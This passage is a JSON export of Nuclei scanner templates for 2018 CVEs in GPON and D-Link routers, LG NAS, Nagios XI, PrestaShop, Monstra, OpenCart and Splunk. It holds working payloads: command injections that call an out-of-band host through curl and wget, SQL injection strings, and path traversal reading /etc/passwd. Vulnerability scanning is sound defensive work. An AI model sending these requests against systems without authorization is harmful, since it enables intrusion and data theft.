"bc35fbfcb2e2876035683dbed2d94923", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308022" }, "name": "CVE-2018-10562.yaml", "content": "id: CVE-2018-10562\n\ninfo:\n name: Dasan GPON Devices - Remote Code Execution\n author: gy741\n severity: critical\n description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with root privileges on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router\n - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10562\n - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-10562\n cwe-id: CWE-78\n epss-score: 0.97441\n epss-percentile: 0.99945\n cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: dasannetworks\n product: gpon_router_firmware\n tags: cve,cve2018,dasan,gpon,rce,oast,kev,dasannetworks\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /GponForm/diag_Form?images/ HTTP/1.1\n Host: {{Hostname}}\n\n XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n - |\n POST /GponForm/diag_Form?images/ HTTP/1.1\n Host: {{Hostname}}\n\n XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950", "hash": "9389cf0bbfebc8b2b8614a34679b2934", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308023" }, "name": "CVE-2018-10735.yaml", "content": "id: CVE-2018-10735\n\ninfo:\n name: NagiosXI <= 5.4.12 `commandline.php` SQL injection\n author: DhiyaneshDk\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.\n reference:\n - https://vulners.com/seebug/SSV:97266\n - https://github.com/chaitin/xray/blob/master/pocs/nagio-cve-2018-10735.yml\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10735\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 490a00463044022035a7d92fb1c6bdc0292d17ac1a892eff48264d750e529eaa1738dc451e31382702204c7fd46d051494a76df2f08a648ed4cac0cadb12ea23ac096fa34020eb4e2fa1:922c64590222798bb761d5b6d8e72950", "hash": "5e03cb3b69cbe001d126e75c01e3f33b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308024" }, "name": "CVE-2018-10736.yaml", "content": "id: CVE-2018-10736\n\ninfo:\n name: NagiosXI <= 5.4.12 - SQL injection\n author: DhiyaneshDK\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.\n reference:\n - https://github.com/0ps/pocassistdb\n - https://github.com/jweny/pocassistdb\n - https://vulners.com/seebug/SSV:97266\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10736\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 4b0a0048304602210096f6d47bc3a2fd2ff957df8bdb5367c2223cc113bd088a105e29d264e9bc7de102210090f4905b4787b7185c8c9495b3de6a65eb1aa90ca66a3e97e77904bdc1d13a09:922c64590222798bb761d5b6d8e72950", "hash": "e5d449137516cc1cafc90e82ecc5d49b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308025" }, "name": "CVE-2018-10737.yaml", "content": "id: CVE-2018-10737\n\ninfo:\n name: NagiosXI <= 5.4.12 logbook.php SQL injection\n author: DhiyaneshDK\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.\n reference:\n - https://vulners.com/seebug/SSV:97267\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10737\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10737\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - raw:\n - |\n POST /nagiosql/admin/logbook.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 4b0a00483046022100f949d4089c1e58b578466210669aa11213a35c30675c334422db2a397452a130022100efde25a1cf6d6e04b0272e13b7dbedaa4967cdef95f25098659f2153a00df361:922c64590222798bb761d5b6d8e72950", "hash": "b18669f8a4cf42932015dfc88fabe786", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308026" }, "name": "CVE-2018-10738.yaml", "content": "id: CVE-2018-10738\n\ninfo:\n name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection\n author: DhiyaneshDk\n severity: high\n description: |\n A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.\n reference:\n - https://qkl.seebug.org/vuldb/ssvid-97268\n - https://vuldb.com/de/?id.117807\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2018-10738\n cwe-id: CWE-89\n epss-score: 0.00403\n epss-percentile: 0.7323\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nagios\n product: nagios_xi\n fofa-query: app=\"Nagios-XI\"\n tags: cve,cve2018,nagios,sqli\n\nvariables:\n num: \"{{rand_int(2000000000, 2100000000)}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/nagiosql/admin/menuaccess.php\"\n headers:\n Content-Type: application/x-www-form-urlencoded\n body: \"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n# digest: 490a0046304402202285ef8eb065ed205938c23f3c003cc2d946d8ab8a6c8c1bd97862cebffd6db60220284522e629f3ac4055349fd664d75a2645f27c19f847da1cb7aa77df38fd73b8:922c64590222798bb761d5b6d8e72950", "hash": "2d38b210141b42b6b56ce5142115278e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308027" }, "name": "CVE-2018-10818.yaml", "content": "id: CVE-2018-10818\n\ninfo:\n name: LG NAS Devices - Remote Code Execution\n author: gy741\n severity: critical\n description: LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by LG to mitigate this vulnerability.\n reference:\n - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/\n - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818\n classification:\n cve-id: CVE-2018-10818\n metadata:\n max-request: 2\n tags: cve,cve2018,lg-nas,rce,oast,injection\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /system/sharedir.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n - |\n POST /en/php/usb_sync.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a0047304502202b56677fec54d514978c64631558171a8f9588ca78711315dd08583d0ed373340221009dff21f2f19a0772452e60725b3701999ff6c59a8bdb380e982af97876bcb175:922c64590222798bb761d5b6d8e72950", "hash": "1dc884bf84545cd732f92ad803939266", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308028" }, "name": "CVE-2018-10822.yaml", "content": "id: CVE-2018-10822\n\ninfo:\n name: D-Link Routers - Local File Inclusion\n author: daffainfo\n severity: high\n description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the target system\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the vulnerability\n reference:\n - https://www.exploit-db.com/exploits/45678\n - http://sploit.tech/2018/10/12/D-Link.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10822\n - https://seclists.org/fulldisclosure/2018/Oct/36\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10822\n cwe-id: CWE-22\n epss-score: 0.10309\n epss-percentile: 0.94824\n cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dwr-116_firmware\n tags: cve2018,cve,dlink,edb,seclists,lfi,router\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/uir//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022023b69fc16b591f910806097c3c53ecff4c83e36806905b7a865a36fa93bc766f02202fe13b9a6e52cc4f9a56f91c5fc5cdd90030c89d3a2015b6e4658c9d9ac4b1a8:922c64590222798bb761d5b6d8e72950", "hash": "49a5c230608014bd2f56e918c97adcb9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308029" }, "name": "CVE-2018-10823.yaml", "content": "id: CVE-2018-10823\n\ninfo:\n name: D-Link Routers - Remote Command Injection\n author: wisnupramoedya\n severity: high\n description: |\n D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.\n remediation: |\n Apply the latest firmware update provided by D-Link to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45676\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10823\n - https://seclists.org/fulldisclosure/2018/Oct/36\n - http://sploit.tech/2018/10/12/D-Link.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-10823\n cwe-id: CWE-78\n epss-score: 0.96737\n epss-percentile: 0.99597\n cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: dwr-116_firmware\n tags: cve,cve2018,rce,iot,dlink,router,edb,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203c3b74b5fd566685fbad5b11a5f88f2cbbaeb6a44476e6e1a11c8846c395474c022026262baad879004dfb8e0433aa4206ea581bcd723c00763109d0eba3f5af5e98:922c64590222798bb761d5b6d8e72950", "hash": "7f3ba7797c5a3e6c7aeec95070ab3fc9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802a" }, "name": "CVE-2018-10942.yaml", "content": "id: CVE-2018-10942\n\ninfo:\n name: Prestashop AttributeWizardPro Module - Arbitrary File Upload\n author: MaStErChO\n severity: critical\n description: |\n In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n reference:\n - https://webcache.googleusercontent.com/search?q=cache:y0TbS2LsRfoJ:www.vfocus.net/art/20160629/12773.html&hl=en&gl=en\n - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10942\n classification:\n cve-id: CVE-2018-10942\n metadata:\n max-request: 8\n tags: prestashop,attributewizardpro,intrusive,file-upload\n\nvariables:\n filename: '{{rand_base(7, \"abc\")}}'\n\nhttp:\n - raw:\n - |\n POST /modules/{{paths}}/file_upload.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n --ba1f796d0aa2482e9c51c81ae6087818\n Content-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\n Content-Type: multipart/form-data\n\n {{randstr}}\n --ba1f796d0aa2482e9c51c81ae6087818--\n\n - |\n GET /modules/{{paths}}/file_uploads/{{file}} HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n paths:\n - 'attributewizardpro'\n - '1attributewizardpro'\n - 'attributewizardpro.OLD'\n - 'attributewizardpro_x'\n\n stop-at-first-match: true\n host-redirects: true\n max-redirects: 3\n matchers-condition: and\n matchers:\n - type: word\n part: body_1\n words:\n - '{{filename}}'\n\n - type: word\n part: body_2\n words:\n - '{{randstr}}'\n\n extractors:\n - type: regex\n name: file\n part: body_1\n internal: true\n group: 1\n regex:\n - '(.*?)\\|\\|\\|\\|'\n# digest: 4b0a00483046022100aab26195eec27b220d615f8c9e60fbab9ae457867d1c4209eb5ae8cacfb3ca18022100a4cb00aa3b61687473a5a2627c73a4958334b53104f383a1c2e6513d003484a1:922c64590222798bb761d5b6d8e72950", "hash": "377c2c6b3e414f2f94be7ad10082d649", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802b" }, "name": "CVE-2018-10956.yaml", "content": "id: CVE-2018-10956\n\ninfo:\n name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.\n reference:\n - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/\n - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb\n - https://www.exploit-db.com/exploits/44916/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-10956\n - https://github.com/xbl3/awesome-cve-poc_qazbnm456\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-10956\n cwe-id: CWE-22\n epss-score: 0.57917\n epss-percentile: 0.97652\n cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ipconfigure\n product: orchid_core_vms\n shodan-query: http.title:\"Orchid Core VMS\"\n tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950", "hash": "2afe9a6f88b7e2362c7a0daaaf082b86", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802c" }, "name": "CVE-2018-11227.yaml", "content": "id: CVE-2018-11227\n\ninfo:\n name: Monstra CMS <=3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.\n reference:\n - https://github.com/monstra-cms/monstra/issues/438\n - https://www.exploit-db.com/exploits/44646\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11227\n - https://github.com/monstra-cms/monstra/issues\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11227\n cwe-id: CWE-79\n epss-score: 0.02135\n epss-percentile: 0.8903\n cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: monstra\n product: monstra_cms\n shodan-query: http.favicon.hash:419828698\n tags: cve,cve2018,xss,mostra,mostracms,cms,edb,monstra\n\nhttp:\n - raw:\n - |\n POST /admin/index.php?id=pages HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n login=\">&password=xxxxxx&login_submit=Log+In\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n - \"Monstra\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022074cd3bf33b0ec1ad4b73a00fa8f4cfde3b82a43929ed109dd58ad53b67201676022076a0f365907066a7d10d38ff9db65c72da72a1cf7dfce6c3a44502c6ae55bdcc:922c64590222798bb761d5b6d8e72950", "hash": "2e2143cde33e1eb662dd8abc5a475a4f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802d" }, "name": "CVE-2018-11231.yaml", "content": "id: CVE-2018-11231\n\ninfo:\n name: Opencart Divido - Sql Injection\n author: ritikchaddha\n severity: high\n description: |\n OpenCart Divido plugin is susceptible to SQL injection\n impact: |\n This vulnerability can lead to data theft, unauthorized access, and potential compromise of the entire Opencart Divido system.\n remediation: |\n Apply the official patch or upgrade to a version that includes the fix.\n reference:\n - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11231\n - http://foreversong.cn/archives/1183\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-11231\n cwe-id: CWE-89\n epss-score: 0.00903\n epss-percentile: 0.82368\n cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:*\n metadata:\n max-request: 1\n vendor: divido\n product: divido\n framework: opencart\n tags: cve,cve2018,opencart,sqli,intrusive,divido\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\n Host: {{Hostname}}\n\n {\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5({{num}})}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094fdc034027036f675331a436c8d9717e75ce79fc7a19d05b65af74381436044022100f81d99821fdfe5caea01c0c541569fd07dd78ac1522bbf7146f0a3b802ac09e8:922c64590222798bb761d5b6d8e72950", "hash": "6cd55c040b2a052e355e388284fa2d2c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802e" }, "name": "CVE-2018-11409.yaml", "content": "id: CVE-2018-11409\n\ninfo:\n name: Splunk <=7.0.1 - Information Disclosure\n author: harshbothra_\n severity: medium\n description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability.\n reference:\n - https://github.com/kofa2002/splunk\n - https://www.exploit-db.com/exploits/44865/\n - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11409\n - http://www.securitytracker.com/id/1041148\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-11409\n cwe-id: CWE-200\n epss-score: 0.81162\n epss-percentile: 0.98059\n cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: splunk\n product: splunk\n tags: cve,cve2018,edb,splunk\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'\n - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - licenseKeys\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b713a4f66f9d5d0e0c1621cb4d7346a8391dfcb9840a579aaf892c3aa5d3b62102210084e5a59025b33e6a132de272f100fa98b4e5478c6ffc88166ad534afe06b9d7f:922c64590222798bb761d5b6d8e72950", "hash": "9786df5edf34493e11418913b6a3328e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30802f" }, "name": "CVE-2018-11473.yaml", "content": "id: CVE-2018-11473\n\ninfo:\n name: Monstra CMS 3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/monstra-cms/monstra/issues/446\n - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11473\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11473\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39534\n cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: monstra\n product: monstra\n shodan-query: http.favicon.hash:419828698\n tags: cve,cve2018,xss,mostra,mostracms,cms,monstra\n\nhttp:\n - raw:\n - |\n GET /users/registration HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /users/registration HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \">\"\n - \"Monstra\"\n case-insensitive: true\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'id=\"csrf\" name=\"csrf\" value=\"(.*)\">'\n internal: true\n part: body\n# digest: 490a004630440220740d343390daffdaa2e4889d6c8f3c60262ea0f8dfefa267015b150d60eb9c46022072f2d72c1ca4e16ec3ce633cf0ad2ae4a154180871ea90d771a74a50410a9bfb:922c64590222798bb761d5b6d8e72950", "hash": "e9d7bb9eddbbd961f32345e5dc82fd9b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308030" }, "name": "CVE-2018-11709.yaml", "content": "id: CVE-2018-11709\n\ninfo:\n name: WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-11709\n - https://wordpress.org/plugins/wpforo/#developers\n - https://wpvulndb.com/vulnerabilities/9090\n - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-11709\n cwe-id: CWE-79\n epss-score: 0.00175\n epss-percentile: 0.53725\n cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: gvectors\n product: wpforo_forum\n framework: wordpress\n tags: cve,cve2018,wordpress,xss,wp-plugin,gvectors\n\nhttp:\n - method: GET\n path:\n - 